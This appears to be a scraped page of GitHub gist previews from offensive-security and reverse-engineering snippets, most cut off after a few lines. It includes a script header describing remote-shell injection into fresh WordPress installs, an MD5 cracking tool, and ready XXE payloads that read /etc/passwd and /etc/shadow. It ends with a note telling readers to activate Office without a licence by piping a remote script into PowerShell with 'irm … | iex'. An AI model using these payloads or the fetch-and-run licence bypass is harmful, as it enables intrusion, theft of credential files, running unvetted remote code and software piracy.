Download and install the prerequisites
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Finding Bezout's Identities using Inverse modulo algorithm - PoC | |
#let gcd(n,e) | |
#from ex + by = 1 | |
#x = e^(-1) mod n | |
#Author: bl4ckbo7 | |
#!/usr/bin/env python3 | |
e = eval(input("Enter the value of a: ")) | |
n = eval(input("Enter the value of b: ")) |
- Drozer - Drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.
- Starting a session
adb forward tcp:31415 tcp:31415
drozer console connect
drozer console connect --server <ip>
- List modules
ls
ls activity
- Retrieving package information
- Starting a session
run app.package.list -f
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# | |
# WordPress Setup Attack Script | |
# | |
# Created by Stephen Rees-Carter (https://stephenreescarter.net/) | |
# | |
# This script injects a remote shell into a fresh copy of WordPress that hasn't been set up yet. | |
# Once the shells have been set up, it removes the config file with the custom database connection to reset the site back to a fresh install. | |
# |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
#Title: Nitrxgen md5 crahking script (Requires the Internet to access the API) | |
#Author: bl4ckbo7 | |
""" | |
[ Examples ] | |
------------ | |
./nitrxgen - hashes.txt | |
./nitrxgen 6b6e8ca697b4ea4bdc8ac88613ab646e |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"encoding/hex" | |
"fmt" | |
"os" | |
"github.com/gdamore/encoding" | |
) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"crypto/aes" | |
"crypto/cipher" | |
"crypto/rand" | |
"encoding/hex" | |
"fmt" | |
"io" | |
"os" |
I figured that I would write down my findings somewhere since this is my first time using Frida. This won't cover installing frida, adb, apktool because these are well covered in other sources.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="ISO-8859-1"?> | |
<!DOCTYPE foo [ | |
<!ELEMENT foo ANY > | |
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> | |
<?xml version="1.0" encoding="ISO-8859-1"?> | |
<!DOCTYPE foo [ | |
<!ELEMENT foo ANY > | |
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo> |
Note
to active Office without crack, just follow https://github.com/WindowsAddict/IDM-Activation-Script,
you wiil only need to run
irm https://massgrave.dev/ias | iex